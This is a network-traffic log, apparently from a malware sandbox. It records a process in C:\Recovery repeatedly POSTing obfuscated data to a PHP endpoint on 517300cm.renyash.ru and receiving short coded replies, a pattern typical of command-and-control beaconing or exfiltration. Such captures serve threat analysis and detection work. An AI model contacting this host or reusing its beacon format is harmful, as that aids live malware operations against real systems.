Jan 9, 2025 18:12:39.846720934 CET	1012	OUT	Data Raw: 50 5e 5b 5a 58 49 50 55 59 58 51 54 5b 53 57 5d 5f 52 58 5a 52 5a 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[ZXIPUYXQT[SW]_RXZRZZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)#) !)3X,+?[ 8>)0W6[:2&&X!,+X+'\"/Y.8
Jan 9, 2025 18:12:39.954663992 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:40.188343048 CET	981	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:40 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XwDD1aYRdIVmpx2j0K%2FCQD0blHfmjzmlw7E%2FXN96yQ3G2Ccc0nYB9FDyirecaME5zbgleGoT5efciczMqqSxSYk8mir524KgX%2Fc0WKvhwvygME%2FhAmrv6UeCtPaN2E9o96TPfnIo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60db17ce0c431-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6340&min_rtt=3525&rtt_var=6953&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=56043&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:40.319133043 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:40.674762011 CET	1012	OUT	Data Raw: 50 57 5b 55 5d 45 50 55 59 58 51 54 5b 5d 57 51 5f 5c 58 5a 52 5f 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[U]EPUYXQT[]WQ_\XZR_ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#) <.^=3$/Y48=:0V5=&&!V&+(!/,<:'\"/Y.
Jan 9, 2025 18:12:40.869353056 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:41.076375008 CET	981	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:41 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bb0TteYqfKWPm8vC3T0Apl6d%2Fr880SLecpd7%2BLRBZqHTZLkbziVkq855NCp7W13cssZh7U1DRPGxHWPg2vbWnxxXHzNFdH9Umtc3p4ewmMOtPB0ar7tZOTZ5qzeXWu%2BE8iVEyjfQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60db72dd40f37-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3773&min_rtt=1751&rtt_var=4702&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=81414&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:41.209332943 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:41.565567017 CET	1012	OUT	Data Raw: 50 56 5b 5f 5d 42 50 54 59 58 51 54 5b 54 57 5d 5f 54 58 5c 52 53 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV[_]BPTYXQT[TW]_TX\RSZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z =3& .)$/0 '^>9<6>91 )V1+4<((:'\"/Y.$
Jan 9, 2025 18:12:41.653584957 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:41.838135004 CET	982	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:41 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z88JTrAzKug8M10yWWsGSf%2FWFNbOGUanPFS4dCw7TyW%2FX%2F9jKoaK8YUOZqtIciKtpdeW2wPMUjFLnKNLojyptaFIY20%2FKkoyaXXIZCBaoSEHGk6MvqvHnnbtdgwoZuMH7e7vw1rP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60dbc1d6d159f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2244&min_rtt=1742&rtt_var=1657&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=253560&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:41.976123095 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:42.331084013 CET	1012	OUT	Data Raw: 50 52 5e 59 5d 40 55 5e 59 58 51 54 5b 53 57 55 5f 5d 58 5d 52 53 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR^Y]@U^YXQT[SWU_]X]RSZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#=_7Z. +,4%7[=#!.&%0%;'^7Y8('\"/Y.8
Jan 9, 2025 18:12:42.441359997 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:42.766143084 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExeXYbj3v7yRe2%2BXiQ5MV5fE%2BSRbO5YhoYldE1ffCAnQvrK7whiZl5sngEF4qxnZvjXJPlJ%2BwZoc4vcUMEpRvf8mIaascyeT9wXQ9nkiSjDLCH9Ek2QpHxWQInRDvVPKW74mRRUp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dc0fed74216-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3483&min_rtt=2040&rtt_var=3651&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=107479&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:42.906797886 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:43.253061056 CET	1012	OUT	Data Raw: 50 53 5b 58 58 40 50 54 59 58 51 54 5b 5c 57 50 5f 5c 58 58 52 5e 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[XX@PTYXQT[\WP_\XXR^ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#> 9\4>/'Z#&<): S!=>$01((7)*'\"/Y.
Jan 9, 2025 18:12:43.381592989 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:43.649554968 CET	800	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nFva8IDVihtz%2FxlQzZvSCt0RsuXUK8BW7tl37hip7Omw3efw0fM9fBvF6Fs8yBUzAzBbesUNFT3fJL5wXYSeg1o2z18tHRYZo7IYWYnt13BmrGqZEKNmfdguah3eQ9JAYZeydpQ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dc6dde94366-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1630&rtt_var=6679&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=56361&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:43.770514011 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:44.127963066 CET	1012	OUT	Data Raw: 50 51 5e 58 58 46 50 50 59 58 51 54 5b 5c 57 57 5f 57 58 5d 52 5a 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ^XXFPPYXQT[\WW_WX]RZZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_)#57=? ;X/,4%*) T":&#!V1; ?_(:'\"/Y.
Jan 9, 2025 18:12:44.237546921 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:44.505961895 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCzcuaAqSyTUVqiwO7dTOV%2F3A2pG%2BYQybxgLCBBuG9jdJ96dnjJusvdTJzwqVE4B8uO7dwEc%2BcAu%2BOOJ8G6EC7%2Bvj%2FAkDwPMi5ozzJ4dfVL78y%2Bw7hbzNqamR6LtY3itbJ96rjKN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dcc3e729dff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5040&min_rtt=1955&rtt_var=6903&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=54810&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:44.656429052 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:45.006998062 CET	1012	OUT	Data Raw: 50 57 5e 5f 5d 44 50 50 59 58 51 54 5b 54 57 53 5f 52 58 58 52 5d 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW^_]DPPYXQT[TWS_RXXR]ZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Y=4?.>4;+Y &;>V5!&28(!/7(:'\"/Y.$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:45.057632923 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:45.409174919 CET	1292	OUT	Data Raw: 50 53 5b 5a 58 44 55 57 59 58 51 54 5b 57 57 5d 5f 53 58 5e 52 5c 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[ZXDUWYXQT[WW]_SX^R\ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)39]#<>#3], %[)3![61 92]?X# +'\"/Y.(
Jan 9, 2025 18:12:45.617779016 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:45.847390890 CET	962	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O60IcdhguFaMh6Y2wAWFPPV9%2F76mwxu1RV8Vwev1Wnh0OV7nYbnZTIcBTGqRN0%2FEOrCnVj6e%2BtMb2%2BCG5XLyJgm%2FeYdcIAPqcwkfUJcYH9NKZVh74F1NPG6ewOil9Ro7F%2B8WkI%2F9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dd4b84b43da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3721&min_rtt=2274&rtt_var=3748&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=105361&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 01 25 36 34 0e 25 2c 2b 54 25 1f 25 55 22 0f 2d 04 3b 07 38 0a 37 3a 0e 01 2c 22 2a 00 35 06 2f 5c 24 32 21 1b 25 12 23 18 23 36 21 5d 01 12 27 07 27 39 36 1f 27 2e 06 58 32 2b 3c 1c 20 2d 24 59 27 38 36 1a 31 33 1d 0b 22 13 2d 1c 29 2d 32 01 2c 11 24 14 2f 37 20 13 28 39 2b 51 0e 10 22 57 27 2d 36 58 3f 10 30 04 24 32 28 1f 28 2f 23 10 31 02 01 0b 2a 39 28 52 33 00 34 5e 20 01 30 10 2a 39 20 5d 24 06 21 50 2a 28 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"%64%,+T%%U"-;87:,"5/\$2!%##6!]''96'.X2+< -$Y'8613"-)-2,$/7 (9+Q"W'-6X?0$2((/#19(R34^ 09 ]$!P( \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:45.372040987 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:45.721678972 CET	1012	OUT	Data Raw: 50 57 5b 55 58 42 50 54 59 58 51 54 5b 52 57 53 5f 51 58 5e 52 5e 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[UXBPTYXQT[RWS_QX^R^ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z >>#,"X?#7/8Z##>*/691 .%] 4,'_+'\"/Y.
Jan 9, 2025 18:12:45.865185976 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:46.427589893 CET	799	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrEbD8VpFq8pmus1y%2FiT3iEIAgEj%2BXn4UUAtBQlsimj0xaZHLuF7tcWgt2YkZzWDLZZfnyjs8NFBh1d%2B6dKTJDTz2cOxF58TGjt23ZRGT1yOdIEApHhAlyBrwgd3zXYMYuXPVdi7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dd6685a4340-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4734&min_rtt=1702&rtt_var=6702&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=56240&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:12:46.517308950 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49778	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:46.653107882 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:47.004864931 CET	1012	OUT	Data Raw: 50 56 5e 5c 58 47 50 50 59 58 51 54 5b 5c 57 54 5f 53 58 58 52 5e 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV^\XGPPYXQT[\WT_SXXR^ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )6 :)#8/[ %/>:<W"=!R$0"&;3^#$?'\"/Y.
Jan 9, 2025 18:12:47.117747068 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:47.305696011 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3JgEQgyV1hfXVa1xHm0yNJFfh40XnTX%2FE2e9rkRkPgprW1JPjb91O3ororQBLoV9la5mdlbOQEzU3x8F8p68QzFZQcyffkXXaGx4VMW1F5vnSMm%2BEqiQAr%2BQ2zp03LQ27%2Fd9XFP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dde39be1a30-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4830&min_rtt=2075&rtt_var=6289&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=60528&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49779	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:47.447691917 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:47.800101995 CET	1012	OUT	Data Raw: 50 54 5b 5e 58 45 55 50 59 58 51 54 5b 52 57 54 5f 52 58 5b 52 5b 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT[^XEUPYXQT[RWT_RX[R[ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Y+394<.>0;/^<4%'Z>;![6&#>1;8 #X+*'\"/Y.
Jan 9, 2025 18:12:47.916336060 CET	25	IN	HTTP/1.1 100 Continue
